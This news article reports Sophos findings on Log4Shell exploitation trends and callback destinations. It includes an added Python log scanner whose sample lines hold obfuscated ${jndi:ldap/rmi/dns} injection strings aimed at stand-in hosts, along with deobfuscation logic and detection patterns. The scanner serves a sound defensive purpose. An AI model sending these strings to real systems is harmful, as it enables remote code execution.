
Log4j patch is already out, but India is top call back destination for vulnerable devices

Thanks to the quick response by the global security companies, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, said Chester Wisniewski, principal research scientist at Sophos.

By: Tech Desk | Pune |
January 25, 2022 5:32:03 pm

While the world hasn’t seen mass exploitation of the Log4j security flaw, the vulnerable library is buried deep in many digital applications and products and will likely be a target for exploitation for years to come, and India is the top callback destination that vulnerable devices are reaching out to, new research by Sophos has revealed.

Writing in a blog post, Chester Wisniewski, principal research scientist at Sophos, said that thanks to the quick response by global security companies there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far. Sophos believes that the immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanised people into action.

The Log4j vulnerability exposed servers of major web tech giants such as Microsoft, Amazon and Apple. For the uninitiated, Log4j is a very common logging library used by Java applications across the world. Logging lets developers record the activity of an application, and Log4j can be made to interpret parts of a logged message as lookups. The vulnerability is serious because exploiting it could allow hackers to control Java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks: the attacker only has to get a crafted string logged, and the vulnerable server then reaches out to an attacker-controlled host to fetch and run Java code. In simple words, the vulnerability could allow a hacker to take control of a system.

Data from Sophos shows the top callback destinations worldwide that vulnerable (unpatched) devices are reaching out to in order to retrieve a Java payload. India takes the number one position, with Turkey, Brazil, the US and even Australia also prominent. It is difficult to speculate as to why these regions are top destinations for callbacks. One reason that Wisniewski gives is active participants in bug bounty programs, who are hoping to earn money by being the first to alert organizations that they are exposed.
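As an added example (not part of the article or the Sophos research), the Python below shows what a "callback" looks like from the defender's side. It scans web-server access log lines for the `${jndi:...}` lookup strings used by Log4Shell probes, undoes the nested-lookup obfuscation (`${lower:...}`, `${upper:...}` and the `:-` default-value form) that Log4j's own interpolator would resolve before the lookup fires, and extracts the scheme, host and port of the server a vulnerable application would have contacted to retrieve the Java payload. The log lines, client addresses and callback hosts are constructed for the example; nothing here is Sophos telemetry.

```python
import re
from collections import Counter
from typing import Optional

# Constructed sample lines (not real telemetry) in the Apache/nginx "combined"
# format. The User-Agent field is a favourite injection point because many
# applications log it verbatim; line 2 uses the nested-lookup obfuscation
# ("${${lower:j}ndi:...}") that a naive search for the literal "${jndi:" misses.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [20/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.8 - - [20/Dec/2021:10:02:44 +0000] "GET /login HTTP/1.1" 200 77 "-" '
    '"${${lower:j}${upper:n}di:${lower:r}mi://callback.example.net:1099/x}"',
    '203.0.113.9 - - [20/Dec/2021:10:03:01 +0000] '
    '"GET /api?q=${jndi:${lower:d}ns://dns.example.org/p} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.10 - - [20/Dec/2021:10:04:19 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
]

# Innermost "${...}" lookup: a body that contains no further "$", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalisation: "${jndi:<scheme>://<host>[:<port>]...". Log4j lower-cases
# lookup prefixes, so "${jNdi:...}" still triggers; hence the re.I flag.
_JNDI_TARGET = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?", re.I
)


def _resolve_inner(match):
    """Resolve the obfuscation lookups the way Log4j's interpolator does."""
    body = match.group(1)
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # "${env:UNSET:-j}" or "${::-j}": an unset key falls back to the default.
        return body.split(":-", 1)[1]
    return match.group(0)  # "jndi:" and anything else stays as written


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    while True:
        resolved = _INNER_LOOKUP.sub(_resolve_inner, text)
        if resolved == text:
            return text
        text = resolved


def extract_callback(line: str) -> Optional[dict]:
    """Return the callback target a vulnerable logger would contact, or None."""
    m = _JNDI_TARGET.search(normalize_lookups(line))
    if not m:
        return None
    return {
        "scheme": m.group("scheme").lower(),
        "host": m.group("host"),
        "port": int(m.group("port")) if m.group("port") else None,
    }


def scan_log(lines) -> list:
    """Collect one finding per line that carries a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        target = extract_callback(line)
        if target:
            findings.append({"line": number, **target})
    return findings


def top_destinations(findings) -> Counter:
    """Count callback hosts; the Sophos data does the same at country level."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG_LINES)
    for finding in hits:
        print(finding)
    print(top_destinations(hits).most_common())
```

Matching only the literal `${jndi:` would miss line 2 entirely, which is why the normalisation step comes first. Counting callback hosts is the same idea as the Sophos chart, minus the GeoIP step that maps each host to a country.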


Volume of exploit attempts

Wisniewski explains that in the first few days the volume of scans was moderate. Within a week, however, there was a significant increase in scan detections, with numbers peaking between December 20 and December 23, 2021.

From late December through January 2022, however, the curve of attack attempts flattened out and declined. “This doesn’t mean the threat level declined too: by this time, an ever-greater percentage of detections were likely real attacks, with fewer coming from researchers monitoring the latest patching status,” the researcher noted.

...the threat continues

According to Wisniewski, the threat is not over yet. “Just because we’ve steered round the immediate iceberg, that doesn’t mean we’re clear of the risk.”

As others have pointed out, some of the initial attack scans may have resulted in attackers securing access to a vulnerable target without, for instance, actually abusing that access to deliver malware, so the successful breach remains undetected.

In the past, Sophos has observed threat actors from countries such as Iran and North Korea pounce on VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy the patches, and then wait months before using that access in an attack.

Sophos believes that attempted exploitation of the Log4Shell vulnerability will likely continue for years and will become a favourite target for penetration testers and nation-state supported threat actors alike. “The urgency of identifying where it is used in applications and updating the software with the patch remains as critical as ever,” the researcher added.

